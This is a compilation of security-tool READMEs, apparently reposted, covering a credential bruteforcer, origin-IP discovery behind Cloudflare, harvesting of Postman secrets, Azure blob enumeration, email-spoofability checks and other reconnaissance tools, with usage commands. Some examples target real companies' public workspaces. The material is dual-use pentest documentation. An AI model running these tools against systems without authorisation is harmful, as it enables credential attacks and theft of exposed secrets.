    Legba is a multiprotocol credentials bruteforcer / password sprayer and enumerator built with Rust and the Tokio asynchronous runtime in order to achieve better performance and stability while consuming fewer resources than similar tools (see the benchmark below).

    For the building instructions, usage and the complete list of options check the project Wiki.


    Supported Protocols/Features:

    AMQP (ActiveMQ, RabbitMQ, Qpid, JORAM and Solace), Cassandra/ScyllaDB, DNS subdomain enumeration, FTP, HTTP (basic authentication, NTLMv1, NTLMv2, multipart form, custom requests with CSRF support, files/folders enumeration, virtual host enumeration), IMAP, Kerberos pre-authentication and user enumeration, LDAP, MongoDB, MQTT, Microsoft SQL, MySQL, Oracle, PostgreSQL, POP3, RDP, Redis, SSH / SFTP, SMTP, STOMP (ActiveMQ, RabbitMQ, HornetQ and OpenMQ), TCP port scanning, Telnet, VNC.

    Benchmark

    Here's a benchmark of legba versus thc-hydra running some common plugins, both targeting the same test servers on localhost. The benchmark has been executed on a macOS laptop with an M1 Max CPU, using a wordlist of 1000 passwords with the correct one being on the last line. Legba was compiled in release mode, Hydra compiled and installed via brew formula.

    Far from being an exhaustive benchmark (some legba features are simply not supported by hydra, such as CSRF token grabbing), this table still gives a clear idea of how using an asynchronous runtime can drastically improve performance.

    Test Name                   | Hydra Tasks | Hydra Time | Legba Tasks | Legba Time
    HTTP basic auth             | 16          | 7.100s     | 10          | 1.560s (4.5x faster)
    HTTP POST login (wordpress) | 16          | 14.854s    | 10          | 5.045s (2.9x faster)
    SSH                         | 16          | 7m29.85s * | 10          | 8.150s (55.1x faster)
    MySQL                       | 4 **        | 9.819s     | 4 **        | 2.542s (3.8x faster)
    Microsoft SQL               | 16          | 7.609s     | 10          | 4.789s (1.5x faster)

    * This result would suggest a default delay between connection attempts in Hydra. I've tried to study the source code to find such a delay, but to my knowledge there is none; for some reason it is simply very slow.
    ** For MySQL hydra automatically reduces the amount of tasks to 4, therefore legba's concurrency level has been adjusted to 4 as well.

    License

    Legba is released under the GPL 3 license. To see the licenses of the project dependencies, install cargo license with cargo install cargo-license and then run cargo license.



    APIDetector - Efficiently Scan For Exposed Swagger Endpoints Across Web Domains And Subdomains

    By: Zion3R


    APIDetector is a powerful and efficient tool designed for testing exposed Swagger endpoints in various subdomains with unique smart capabilities to detect false-positives. It's particularly useful for security professionals and developers who are engaged in API testing and vulnerability scanning.


    Features

    • Flexible Input: Accepts a single domain or a list of subdomains from a file.
    • Multiple Protocols: Option to test endpoints over both HTTP and HTTPS.
    • Concurrency: Utilizes multi-threading for faster scanning.
    • Customizable Output: Save results to a file or print to stdout.
    • Verbose and Quiet Modes: Default verbose mode for detailed logs, with an option for quiet mode.
    • Custom User-Agent: Ability to specify a custom User-Agent for requests.
    • Smart Detection of False-Positives: Ability to detect most false-positives.

    Getting Started

    Prerequisites

    Before running APIDetector, ensure you have Python 3.x and pip installed on your system. You can download Python here.

    Installation

    Clone the APIDetector repository to your local machine using:

    git clone https://github.com/brinhosa/apidetector.git
    cd apidetector
    pip install requests

    Usage

    Run APIDetector using the command line. Here are some usage examples:

    • Common usage, scan with 30 threads a list of subdomains using a Chrome user-agent and save the results in a file:

      python apidetector.py -i list_of_company_subdomains.txt -o results_file.txt -t 30 -ua "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36"
    • To scan a single domain:

      python apidetector.py -d example.com
    • To scan multiple domains from a file:

      python apidetector.py -i input_file.txt
    • To specify an output file:

      python apidetector.py -i input_file.txt -o output_file.txt
    • To use a specific number of threads:

      python apidetector.py -i input_file.txt -t 20
    • To scan with both HTTP and HTTPS protocols:

      python apidetector.py -m -d example.com
    • To run the script in quiet mode (suppress verbose output):

      python apidetector.py -q -d example.com
    • To run the script with a custom user-agent:

      python apidetector.py -d example.com -ua "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36"

    Options

    • -d, --domain: Single domain to test.
    • -i, --input: Input file containing subdomains to test.
    • -o, --output: Output file to write valid URLs to.
    • -t, --threads: Number of threads to use for scanning (default is 10).
    • -m, --mixed-mode: Test both HTTP and HTTPS protocols.
    • -q, --quiet: Disable verbose output (default mode is verbose).
    • -ua, --user-agent: Custom User-Agent string for requests.

    RISK DETAILS OF EACH ENDPOINT APIDETECTOR FINDS

    Exposing Swagger or OpenAPI documentation endpoints can present various risks, primarily related to information disclosure. Here's an ordered list of the endpoints APIDetector scans, based on potential risk levels, with similar endpoints grouped together:

    1. High-Risk Endpoints (Direct API Documentation):

    • Endpoints:
      • '/swagger-ui.html', '/swagger-ui/', '/swagger-ui/index.html', '/api/swagger-ui.html', '/documentation/swagger-ui.html', '/swagger/index.html', '/api/docs', '/docs', '/api/swagger-ui', '/documentation/swagger-ui'
    • Risk:
      • These endpoints typically serve the Swagger UI interface, which provides a complete overview of all API endpoints, including request formats, query parameters, and sometimes even example requests and responses.
      • Risk Level: High. Exposing these gives potential attackers detailed insights into your API structure and potential attack vectors.

    2. Medium-High Risk Endpoints (API Schema/Specification):

    • Endpoints:
      • '/openapi.json', '/swagger.json', '/api/swagger.json', '/swagger.yaml', '/swagger.yml', '/api/swagger.yaml', '/api/swagger.yml', '/api.json', '/api.yaml', '/api.yml', '/documentation/swagger.json', '/documentation/swagger.yaml', '/documentation/swagger.yml'
    • Risk:
      • These endpoints provide raw Swagger/OpenAPI specification files. They contain detailed information about the API endpoints, including paths, parameters, and sometimes authentication methods.
      • Risk Level: Medium-High. While they require more interpretation than the UI interfaces, they still reveal extensive information about the API.

    3. Medium Risk Endpoints (API Documentation Versions):

    • Endpoints:
      • '/v2/api-docs', '/v3/api-docs', '/api/v2/swagger.json', '/api/v3/swagger.json', '/api/v1/documentation', '/api/v2/documentation', '/api/v3/documentation', '/api/v1/api-docs', '/api/v2/api-docs', '/api/v3/api-docs', '/swagger/v2/api-docs', '/swagger/v3/api-docs', '/swagger-ui.html/v2/api-docs', '/swagger-ui.html/v3/api-docs', '/api/swagger/v2/api-docs', '/api/swagger/v3/api-docs'
    • Risk:
      • These endpoints often refer to version-specific documentation or API descriptions. They reveal information about the API's structure and capabilities, which could aid an attacker in understanding the API's functionality and potential weaknesses.
      • Risk Level: Medium. These might not be as detailed as the complete documentation or schema files, but they still provide useful information for attackers.

    4. Lower Risk Endpoints (Configuration and Resources):

    • Endpoints:
      • '/swagger-resources', '/swagger-resources/configuration/ui', '/swagger-resources/configuration/security', '/api/swagger-resources', '/api.html'
    • Risk:
      • These endpoints often provide auxiliary information, configuration details, or resources related to the API documentation setup.
      • Risk Level: Lower. They may not directly reveal API endpoint details but can give insights into the configuration and setup of the API documentation.

    Summary:

    • Highest Risk: Directly exposing interactive API documentation interfaces.
    • Medium-High Risk: Exposing raw API schema/specification files.
    • Medium Risk: Version-specific API documentation.
    • Lower Risk: Configuration and resource files for API documentation.
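    For a quick manual spot-check of a single host against a few of the paths listed above (outside of APIDetector itself), something like the following works; example.com is a placeholder:

      for p in /swagger-ui.html /v3/api-docs /openapi.json; do
        curl -s -o /dev/null -w "%{http_code}  https://example.com$p\n" "https://example.com$p"
      done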

    Recommendations:

    • Access Control: Ensure that these endpoints are not publicly accessible or are at least protected by authentication mechanisms.
    • Environment-Specific Exposure: Consider exposing detailed API documentation only in development or staging environments, not in production.
    • Monitoring and Logging: Monitor access to these endpoints and set up alerts for unusual access patterns.

    Contributing

    Contributions to APIDetector are welcome! Feel free to fork the repository, make changes, and submit pull requests.

    Legal Disclaimer

    The use of APIDetector should be limited to testing and educational purposes only. The developers of APIDetector assume no liability and are not responsible for any misuse or damage caused by this tool. It is the end user's responsibility to obey all applicable local, state, and federal laws. Developers assume no responsibility for unauthorized or illegal use of this tool. Before using APIDetector, ensure you have permission to test the network or systems you intend to scan.

    License

    This project is licensed under the MIT License.

    Acknowledgments



    CloakQuest3r - Uncover The True IP Address Of Websites Safeguarded By Cloudflare

    By: Zion3R


    CloakQuest3r is a powerful Python tool meticulously crafted to uncover the true IP address of websites safeguarded by Cloudflare, a widely adopted web security and performance enhancement service. Its core mission is to accurately discern the actual IP address of web servers that are concealed behind Cloudflare's protective shield. Subdomain scanning is employed as a key technique in this pursuit. This tool is an invaluable resource for penetration testers, security professionals, and web administrators seeking to perform comprehensive security assessments and identify vulnerabilities that may be obscured by Cloudflare's security measures.


    Key Features:

    • Real IP Detection: CloakQuest3r excels in the art of discovering the real IP address of web servers employing Cloudflare's services. This crucial information is paramount for conducting comprehensive penetration tests and ensuring the security of web assets.

    • Subdomain Scanning: Subdomain scanning is harnessed as a fundamental component in the process of finding the real IP address. It aids in the identification of the actual server responsible for hosting the website and its associated subdomains.

    • Threaded Scanning: To enhance efficiency and expedite the real IP detection process, CloakQuest3r utilizes threading. This feature enables scanning of a substantial list of subdomains without significantly extending the execution time.

    • Detailed Reporting: The tool provides comprehensive output, including the total number of subdomains scanned, the total number of subdomains found, and the time taken for the scan. Any real IP addresses unveiled during the process are also presented, facilitating in-depth analysis and penetration testing.

    With CloakQuest3r, you can confidently evaluate website security, unveil hidden vulnerabilities, and secure your web assets by disclosing the true IP address concealed behind Cloudflare's protective layers.
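    The underlying intuition can be checked by hand with dig: the Cloudflare-fronted apex resolves to Cloudflare edge IPs, while an unprotected subdomain may resolve straight to the origin server. This is only a manual illustration, not the tool's implementation, and example.com is a placeholder:

      dig +short example.com        # typically returns Cloudflare edge IPs
      dig +short mail.example.com   # an unprotected subdomain may reveal the origin IP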

    Limitation

    - Still in the development phase; sometimes it can't detect the real IP.

    - CloakQuest3r combines multiple indicators to uncover real IP addresses behind Cloudflare. While subdomain scanning is a part of the process, we do not assume that all subdomains' A records point to the target host. The tool is designed to provide valuable insights but may not work in every scenario. We welcome any specific suggestions for improvement.

    1. False Negatives: CloakQuest3r may not always accurately identify the real IP address behind Cloudflare, particularly for websites with complex network configurations or strict security measures.

    2. Dynamic Environments: Websites' infrastructure and configurations can change over time. The tool may not capture these changes, potentially leading to outdated information.

    3. Subdomain Variation: While the tool scans subdomains, it doesn't guarantee that all subdomains' A records will point to the primary host. Some subdomains may also be protected by Cloudflare.

    This tool is a Proof of Concept and is for Educational Purposes Only.

    How to Use:

    1. Run CloudScan with a single command-line argument: the target domain you want to analyze.

       git clone https://github.com/spyboy-productions/CloakQuest3r.git
      cd CloakQuest3r
      pip3 install -r requirements.txt
      python cloakquest3r.py example.com
    2. The tool will check if the website is using Cloudflare. If not, it will inform you that subdomain scanning is unnecessary.

    3. If Cloudflare is detected, CloudScan will scan for subdomains and identify their real IP addresses.

    4. You will receive detailed output, including the number of subdomains scanned, the total number of subdomains found, and the time taken for the scan.

    5. Any real IP addresses found will be displayed, allowing you to conduct further analysis and penetration testing.

    CloudScan simplifies the process of assessing website security by providing a clear, organized, and informative report. Use it to enhance your security assessments, identify potential vulnerabilities, and secure your web assets.

    Run It Online:

    Run it online on replit.com : https://replit.com/@spyb0y/CloakQuest3r



    Porch-Pirate - The Most Comprehensive Postman Recon / OSINT Client And Framework That Facilitates The Automated Discovery And Exploitation Of API Endpoints And Secrets Committed To Workspaces, Collections, Requests, Users And Teams

    By: Zion3R


    Porch Pirate started as a tool to quickly uncover Postman secrets, and has slowly begun to evolve into a multi-purpose reconnaissance / OSINT framework for Postman. While existing tools are great proof of concepts, they only attempt to identify very specific keywords as "secrets", and in very limited locations, with no consideration to recon beyond secrets. We realized we required capabilities that were "secret-agnostic", and had enough flexibility to capture false-positives that still provided offensive value.

    Porch Pirate enumerates and presents sensitive results (global secrets, unique headers, endpoints, query parameters, authorization, etc), from publicly accessible Postman entities, such as:

    • Workspaces
    • Collections
    • Requests
    • Users
    • Teams

    Installation

    python3 -m pip install porch-pirate

    Using the client

    The Porch Pirate client can be used to conduct nearly complete reviews of public Postman entities in a quick and simple fashion. There are intended workflows and particular keywords to be used that can typically maximize results. These methodologies can be located on our blog: Plundering Postman with Porch Pirate.

    Porch Pirate supports the following arguments to be performed on collections, workspaces, or users.

    • --globals
    • --collections
    • --requests
    • --urls
    • --dump
    • --raw
    • --curl

    Simple Search

    porch-pirate -s "coca-cola.com"

    Get Workspace Globals

    By default, Porch Pirate will display globals from all active and inactive environments if they are defined in the workspace. Provide a -w argument with the workspace ID (found by performing a simple search, or automatic search dump) to extract the workspace's globals, along with other information.

    porch-pirate -w abd6bded-ac31-4dd5-87d6-aa4a399071b8

    Dump Workspace

    When an interesting result has been found with a simple search, we can provide the workspace ID to the -w argument with the --dump command to begin extracting information from the workspace and its collections.

    porch-pirate -w abd6bded-ac31-4dd5-87d6-aa4a399071b8 --dump

    Automatic Search and Globals Extraction

    Porch Pirate can be supplied a simple search term, following the --globals argument. Porch Pirate will dump all relevant workspaces tied to the results discovered in the simple search, but only if there are globals defined. This is particularly useful for quickly identifying potentially interesting workspaces to dig into further.

    porch-pirate -s "shopify" --globals

    Automatic Search Dump

    Porch Pirate can be supplied a simple search term, following the --dump argument. Porch Pirate will dump all relevant workspaces and collections tied to the results discovered in the simple search. This is particularly useful for quickly sifting through potentially interesting results.

    porch-pirate -s "coca-cola.com" --dump

    Extract URLs from Workspace

    A particularly useful way to use Porch Pirate is to extract all URLs from a workspace and export them to another tool for fuzzing.

    porch-pirate -w abd6bded-ac31-4dd5-87d6-aa4a399071b8 --urls

    Automatic URL Extraction

    Porch Pirate will recursively extract all URLs from workspaces and their collections related to a simple search term.

    porch-pirate -s "coca-cola.com" --urls

    Show Collections in a Workspace

    porch-pirate -w abd6bded-ac31-4dd5-87d6-aa4a399071b8 --collections

    Show Workspace Requests

    porch-pirate -w abd6bded-ac31-4dd5-87d6-aa4a399071b8 --requests

    Show raw JSON

    porch-pirate -w abd6bded-ac31-4dd5-87d6-aa4a399071b8 --raw

    Show Entity Information

    porch-pirate -w WORKSPACE_ID
    porch-pirate -c COLLECTION_ID
    porch-pirate -r REQUEST_ID
    porch-pirate -u USERNAME/TEAMNAME

    Convert Request to Curl

    Porch Pirate can build curl requests when provided with a request ID for easier testing.

    porch-pirate -r 11055256-b1529390-18d2-4dce-812f-ee4d33bffd38 --curl

    Use a proxy

    porch-pirate -s coca-cola.com --proxy 127.0.0.1:8080

    Using as a library

    Searching

    p = porchpirate()
    print(p.search('coca-cola.com'))

    Get Workspace Collections

    p = porchpirate()
    print(p.collections('4127fdda-08be-4f34-af0e-a8bdc06efaba'))

    Dumping a Workspace

    import json

    p = porchpirate()
    collections = json.loads(p.collections('4127fdda-08be-4f34-af0e-a8bdc06efaba'))
    for collection in collections['data']:
        requests = collection['requests']
        for r in requests:
            request_data = p.request(r['id'])
            print(request_data)

    Grabbing a Workspace's Globals

    p = porchpirate()
    print(p.workspace_globals('4127fdda-08be-4f34-af0e-a8bdc06efaba'))

    Other Examples

    Other library usage examples can be located in the examples directory, which contains the following examples:

    • dump_workspace.py
    • format_search_results.py
    • format_workspace_collections.py
    • format_workspace_globals.py
    • get_collection.py
    • get_collections.py
    • get_profile.py
    • get_request.py
    • get_statistics.py
    • get_team.py
    • get_user.py
    • get_workspace.py
    • recursive_globals_from_search.py
    • request_to_curl.py
    • search.py
    • search_by_page.py
    • workspace_collections.py


    OSINT-Framework - OSINT Framework

    By: Zion3R


    OSINT framework focused on gathering information from free tools or resources. The intention is to help people find free OSINT resources. Some of the sites included might require registration or offer more data for $$$, but you should be able to get at least a portion of the available information for no cost.

    I originally created this framework with an information security point of view. Since then, the response from other fields and disciplines has been incredible. I would love to be able to include any other OSINT resources, especially from fields outside of infosec. Please let me know about anything that might be missing!

    Please visit the framework at the link below and good hunting!


    https://osintframework.com

    Legend

    (T) - Indicates a link to a tool that must be installed and run locally
    (D) - Google Dork, for more information: Google Hacking
    (R) - Requires registration
    (M) - Indicates a URL that contains the search term and the URL itself must be edited manually

    For Update Notifications

    Follow me on Twitter: @jnordine - https://twitter.com/jnordine
    Watch or star the project on Github: https://github.com/lockfale/osint-framework

    Suggestions, Comments, Feedback

    Feedback or new tool suggestions are extremely welcome! Please feel free to submit a pull request or open an issue on github or reach out on Twitter.

    Contribute with a GitHub Pull Request

    For new resources, please ensure that the site is available for public and free use.

    1. Update the arf.json file in the format shown below. If this isn't the first entry for a folder, add a comma to the last closing brace of the previous entry.
    2. Submit pull request!
    3. Thank you!

    OSINT Framework Website

    https://osintframework.com

    Happy Hunting!



    Goblob - A Fast Enumeration Tool For Publicly Exposed Azure Storage Blobs

    By: Zion3R


    Goblob is a lightweight and fast enumeration tool designed to aid in the discovery of sensitive information exposed publicly in Azure blobs, which can be useful for various research purposes such as vulnerability assessments, penetration testing, and reconnaissance.

    Warning. Goblob will issue individual goroutines for each container name to check in each storage account, only limited by the maximum number of concurrent goroutines specified in the -goroutines flag. This implementation can exhaust bandwidth pretty quickly in most cases with the default wordlist, or potentially cost you a lot of money if you're using the tool in a cloud environment. Make sure you understand what you are doing before running the tool.


    Installation

    go install github.com/Macmod/goblob@latest

    Usage

    To use goblob simply run the following command:

    $ ./goblob <storageaccountname>

    Where <storageaccountname> is the target storage account to enumerate public Azure blob storage URLs on.

    You can also specify a list of storage account names to check:

    $ ./goblob -accounts accounts.txt

    By default, the tool will use a list of common Azure Blob Storage container names to construct potential URLs. However, you can also specify a custom list of container names using the -containers option. For example:

    $ ./goblob -accounts accounts.txt -containers wordlists/goblob-folder-names.txt

    The tool also supports outputting the results to a file using the -output option:

    $ ./goblob -accounts accounts.txt -containers wordlists/goblob-folder-names.txt -output results.txt

    If you want to provide accounts to test via stdin you can also omit -accounts (or the account name) entirely:

    $ cat accounts.txt | ./goblob

    Wordlists

    Goblob comes bundled with basic wordlists that can be used with the -containers option:

    Optional Flags

    Goblob provides several flags that can be tuned in order to improve the enumeration process:

    • -goroutines=N - Maximum number of concurrent goroutines to allow (default: 5000).
    • -blobs=true - Report the URL of each blob instead of the URL of the containers (default: false).
    • -verbose=N - Set verbosity level (default: 1, min: 0, max: 3).
    • -maxpages=N - Maximum of container pages to traverse looking for blobs (default: 20, set to -1 to disable limit or to 0 to avoid listing blobs at all and just check if the container is public)
    • -timeout=N - Timeout for HTTP requests (seconds, default: 90)
    • -maxidleconns=N - MaxIdleConns transport parameter for HTTP client (default: 100)
    • -maxidleconnsperhost=N - MaxIdleConnsPerHost transport parameter for HTTP client (default: 10)
    • -maxconnsperhost=N - MaxConnsPerHost transport parameter for HTTP client (default: 0)
    • -skipssl=true - Skip SSL verification (default: false)
    • -invertsearch=true - Enumerate accounts for each container instead of containers for each account (default: false)

    For instance, if you just want to find publicly exposed containers using large lists of storage accounts and container names, you should use -maxpages=0 to prevent the goroutines from paginating the results. Then run it again on the set of results you found with -blobs=true and -maxpages=-1 to actually get the URLs of the blobs.

    If, on the other hand, you want to test a small list of very popular container names against a large set of storage accounts, you might want to try -invertsearch=true with -maxpages=0, in order to see the public accounts for each container name instead of the container names for each storage account.
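    Putting the two workflows above together with the documented flags might look like the following. File names are placeholders, and the second-stage input depends on how you post-process the first-stage results:

      # Stage 1: only check whether containers are public, without listing blobs
      ./goblob -accounts accounts.txt -containers wordlists/goblob-folder-names.txt -maxpages=0 -output hits.txt

      # Stage 2: re-run against the interesting accounts/containers to enumerate blob URLs
      ./goblob -accounts interesting-accounts.txt -containers interesting-containers.txt -blobs=true -maxpages=-1

      # Inverted search: popular container names against many storage accounts
      ./goblob -accounts accounts.txt -containers popular-containers.txt -invertsearch=true -maxpages=0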

    You may also want to try changing -goroutines, -timeout and -maxidleconns, -maxidleconnsperhost and -maxconnsperhost and -skipssl in order to best use your bandwidth and find results faster.

    Experiment with the flags to find what works best for you ;-)

    Example


    Contributing

    Contributions are welcome by opening an issue or by submitting a pull request.

    TODO

    • Check blob domain for NXDOMAIN before trying wordlist to save bandwidth (maybe)
    • Improve default parameters for better performance

    Wordcloud

    An interesting visualization of popular container names found in my experiments with the tool:


    If you want to know more about my experiments and the subject in general, take a look at my article:



    CloudPulse - AWS Cloud Landscape Search Engine

    By: Zion3R


    During the reconnaissance phase, an attacker searches for any information about their target to build a profile that will later help them identify possible ways into an organization.
    CloudPulse is a powerful tool that simplifies and enhances the analysis of SSL certificate data. It leverages the extensive repository of SSL certificates obtained from the AWS EC2 machines available at Trickest Cloud. With CloudPulse, security researchers can efficiently explore SSL certificate details, uncover potential vulnerabilities, and gather valuable insights for a variety of security-related tasks.


    Simplifies security assessments with a user-friendly interface. It allows you to effortlessly find a company's assets on the AWS cloud:

    • IPs
    • subdomains
    • domains associated with a target
    • organization name
    • discover origin ips

    1- Download CloudPulse :

    git clone https://github.com/yousseflahouifi/CloudPulse
    cd CloudPulse/

    2- Run docker compose :

    docker-compose up -d

    3- Run script.py script

    docker-compose exec web python script.py

    4 - Now go to http://:8000/search and enjoy the search engine

    1- download CloudPulse :

    git clone https://github.com/yousseflahouifi/CloudPulse
    cd CloudPulse/

    2- Setup virtual environment :

    python3 -m venv myenv
    source myenv/bin/activate

    3- Install requirements.txt file :

    pip install -r requirements.txt

    4- run an instance of elasticsearch using docker :

    docker run -d --name elasticsearch -p 9200:9200 -e "discovery.type=single-node" elasticsearch:6.6.1

    5- update script.py and settings file to the host 'localhost':

    # script.py
    es = Elasticsearch([{'host': 'localhost', 'port': 9200}])

    # se/settings.py
    ELASTICSEARCH_DSL = {
        'default': {
            'hosts': 'localhost:9200'
        },
    }

    6- Run script.py to index data in elasticsearch:

    python script.py

    7- Run the app:

    python manage.py runserver 0:8000

    Included in the CloudPulse repository is a sample data.csv file containing close to 4,000 records, which provides a glimpse of the tool's capabilities. For the full dataset, visit the Trickest Cloud repository, clone the data and update the data.csv file (it contains close to 9 million records).

    As an example, searching for .mil data gives:

    Searching for tesla as an example gives:

    CloudPulse heavily depends on the data.csv file, which is a sample dataset extracted from the larger collection maintained by Trickest. While the sample dataset provides valuable insights, the tool's full potential is realized when used in conjunction with the complete dataset, which is accessible in the Trickest repository here.
    Users are encouraged to refer to the Trickest dataset for a more comprehensive and up-to-date analysis.



    Mailchecker - Cross-language Temporary (Disposable/Throwaway) Email Detection Library. Covers 55 734+ Fake Email Providers

    By: Zion3R


    Cross-language email validation. Backed by a database of over 55 000 throwable email domains.

    This will be very helpful when you have to contact your users and you want to avoid errors causing lack of communication or want to block "spamboxes".


    Need to provide Webhooks inside your SaaS?

    Need to embed a chart into an email?

    It's over with Image-Charts, no more server-side rendering pain, 1 url = 1 chart.

    https://image-charts.com/chart?
    cht=lc // chart type
    &chd=s:cEAELFJHHHKUju9uuXUc // chart data
    &chxt=x,y // axis
    &chxl=0:|0|1|2|3|4|5| // axis labels
    &chs=873x200 // size

    Use Image-Charts for free


    Upgrade from 1.x to 3.x

    Mailchecker public API has been normalized, here are the changes:

    • NodeJS/JavaScript: MailChecker(email) -> MailChecker.isValid(email)
    • PHP: MailChecker($email) -> MailChecker::isValid($email)
    • Python
      import MailChecker
      m = MailChecker.MailChecker()
      if not m.is_valid('bla@example.com'):
          # ...

    became:

    import MailChecker
    if not MailChecker.is_valid('bla@example.com'):
        # ...

    MailChecker currently supports:


    Usage

    NodeJS

    var MailChecker = require('mailchecker');

    if(!MailChecker.isValid('myemail@yopmail.com')){
        console.error('O RLY !');
        process.exit(1);
    }

    if(!MailChecker.isValid('myemail.com')){
        console.error('O RLY !');
        process.exit(1);
    }

    JavaScript

    <script type="text/javascript" src="MailChecker/platform/javascript/MailChecker.js"></script>
    <script type="text/javascript">
        if(!MailChecker.isValid('myemail@yopmail.com')){
            console.error('O RLY !');
        }

        if(!MailChecker.isValid('myemail.com')){
            console.error('O RLY !');
        }
    </script>

    PHP

    include __DIR__."/MailChecker/platform/php/MailChecker.php";

    if(!MailChecker::isValid('myemail@yopmail.com')){
        die('O RLY !');
    }

    if(!MailChecker::isValid('myemail.com')){
        die('O RLY !');
    }

    Python

    pip install mailchecker
    from MailChecker import MailChecker

    if not MailChecker.is_valid('bla@example.com'):
        print("O RLY !")

    Django validator: https://github.com/jonashaag/django-indisposable

    Ruby

    require 'mail_checker'

    unless MailChecker.valid?('myemail@yopmail.com')
      fail('O RLY!')
    end

    Rust

     extern crate mailchecker;

    assert_eq!(true, mailchecker::is_valid("plop@plop.com"));
    assert_eq!(false, mailchecker::is_valid("\nok@gmail.com\n"));
    assert_eq!(false, mailchecker::is_valid("ok@guerrillamailblock.com"));

    Elixir

    Code.require_file("mail_checker.ex", "mailchecker/platform/elixir/")

    unless MailChecker.valid?("myemail@yopmail.com") do
      raise "O RLY !"
    end

    unless MailChecker.valid?("myemail.com") do
      raise "O RLY !"
    end

    Clojure

    ; no package yet; just drop in mailchecker.clj where you want to use it.
    (load-file "platform/clojure/mailchecker.clj")

    (if (not (mailchecker/valid? "myemail@yopmail.com"))
    (throw (Throwable. "O RLY!")))

    (if (not (mailchecker/valid? "myemail.com"))
    (throw (Throwable. "O RLY!")))

    Go

    package main

    import (
        "log"

        "github.com/FGRibreau/mailchecker/platform/go"
    )

    func main() {
        if !mail_checker.IsValid("myemail@yopmail.com") {
            log.Fatal("O RLY !")
        }

        if !mail_checker.IsValid("myemail.com") {
            log.Fatal("O RLY !")
        }
    }

    Installation

    Go

    go get github.com/FGRibreau/mailchecker

    NodeJS/JavaScript

    npm install mailchecker

    Ruby

    gem install ruby-mailchecker

    PHP

    composer require fgribreau/mailchecker

    We accept pull-requests for other package managers.

    Data sources

    TorVPN

      $('td', 'table:last').map(function(){
          return this.innerText;
      }).toArray();

    BloggingWV

      Array.prototype.slice.call(document.querySelectorAll('.entry > ul > li a')).map(function(el){return el.innerText});

    ... please add your own dataset to list.txt.

    Regenerate libraries from list.txt

    Just run (requires NodeJS):

    npm run build

    Development

    Development environment requires docker.

    # install and setup every language dependencies in parallel through docker
    npm install

    # run every language setup in parallel through docker
    npm run setup

    # run every language tests in parallel through docker
    npm test

    Backers

    Maintainers

    These amazing people are maintaining this project:

    Contributors

    These amazing people have contributed code to this project:

    Discover how you can contribute by heading on over to the CONTRIBUTING.md file.

    Changelog



    PathFinder - Tool That Provides Information About A Website

    By: Zion3R


    Web Path Finder is a Python program that provides information about a website. It retrieves various details such as page title, last updated date, DNS information, subdomains, firewall names, technologies used, certificate information, and more.


    • Retrieve important information about a website
    • Gain insights into the technologies used by a website
    • Identify subdomains and DNS information
    • Check firewall names and certificate details
    • Perform bypass operations for captcha and JavaScript content

    1. Clone the repository:

      git clone https://github.com/HalilDeniz/PathFinder.git
    2. Install the required packages:

      pip install -r requirements.txt

    This will install all the required modules and their respective versions.

    Run the program using the following command:

    β”Œβ”€β”€(root💀denizhalil)-[~/MyProjects/]
    └─# python3 web-info-explorer.py --help
    usage: wpathFinder.py [-h] url

    Web Information Program

    positional arguments:
    url Enter the site URL

    options:
    -h, --help show this help message and exit

    Replace <url> with the URL of the website you want to explore.

    Here is an example output of running the program:

    β”Œβ”€β”€(root💀denizhalil)-[~/MyProjects/]
    └─# python3 pathFinder.py https://www.facebook.com/
    Site Information:
    Title: Facebook - Login or Register
    Last Updated Date: None
    First Creation Date: 1997-03-29 05:00:00
    Dns Information: []
    Sub Branches: ['157']
    Firewall Names: []
    Technologies Used: javascript, php, css, html, react
    Certificate Information:
    Certificate Issuer: US
    Certificate Start Date: 2023-02-07 00:00:00
    Certificate Expiration Date: 2023-05-08 23:59:59
    Certificate Validity Period (Days): 90
    Bypassed JavaScript content:
    </ div>

    Contributions are welcome! To contribute to PathFinder, follow these steps:

    1. Fork the repository.
    2. Create a new branch for your feature or bug fix.
    3. Make your changes and commit them.
    4. Push your changes to your forked repository.
    5. Open a pull request in the main repository.

    • Thank you my friend Varol

    This project is licensed under the MIT License - see the LICENSE file for details.

    For any inquiries or further information, you can reach me through the following channels:



    Spoofy - Program That Checks If A List Of Domains Can Be Spoofed Based On SPF And DMARC Records

    By: Zion3R



    Spoofy is a program that checks if a list of domains can be spoofed based on SPF and DMARC records. You may be asking, "Why do we need another tool that can check if a domain can be spoofed?"

    Well, Spoofy is different and here is why:

    1. Authoritative lookups on all lookups with known fallback (Cloudflare DNS)
    2. Accurate bulk lookups
    3. Custom, manually tested spoof logic (No guessing or speculating, real world test results)
    4. SPF lookup counter
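    The records Spoofy reasons about can also be inspected by hand with dig, shown here only to illustrate where SPF and DMARC live in DNS (example.com is a placeholder):

      dig +short TXT example.com          # SPF record, e.g. "v=spf1 include:... ~all"
      dig +short TXT _dmarc.example.com   # DMARC record, e.g. "v=DMARC1; p=none; ..."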


    HOW TO USE

    Spoofy requires Python 3+. Python 2 is not supported. Usage is shown below:

    Usage:
    ./spoofy.py -d [DOMAIN] -o [stdout or xls]
    OR
    ./spoofy.py -iL [DOMAIN_LIST] -o [stdout or xls]

    Install Dependencies:
    pip3 install -r requirements.txt

    HOW DO YOU KNOW ITS SPOOFABLE

    (The spoofability table lists every combination of SPF and DMARC configurations that impact deliverability to the inbox, except for DKIM modifiers.) Download Here

    METHODOLOGY

    The creation of the spoofability table involved listing every relevant SPF and DMARC configuration, combining them, and then conducting SPF and DMARC information collection using an early version of Spoofy on a large number of US government domains. Testing if an SPF and DMARC combination was spoofable or not was done using the email security pentesting suite at emailspooftest using Microsoft 365. However, the initial testing was conducted using Protonmail and Gmail, but these services were found to utilize reverse lookup checks that affected the results, particularly for subdomain spoof testing. As a result, Microsoft 365 was used for the testing, as it offered greater control over the handling of mail.

    After the initial testing using Microsoft 365, some combinations were retested using Protonmail and Gmail due to the differences in their handling of banners in emails. Protonmail and Gmail can place spoofed mail in the inbox with a banner or in spam without a banner, leading to some SPF and DMARC combinations being reported as "Mailbox Dependent" when using Spoofy. In contrast, Microsoft 365 places both conditions in spam. The testing and data collection process took several days to complete, after which a good master table was compiled and used as the basis for the Spoofy spoofability logic.

    DISCLAIMER

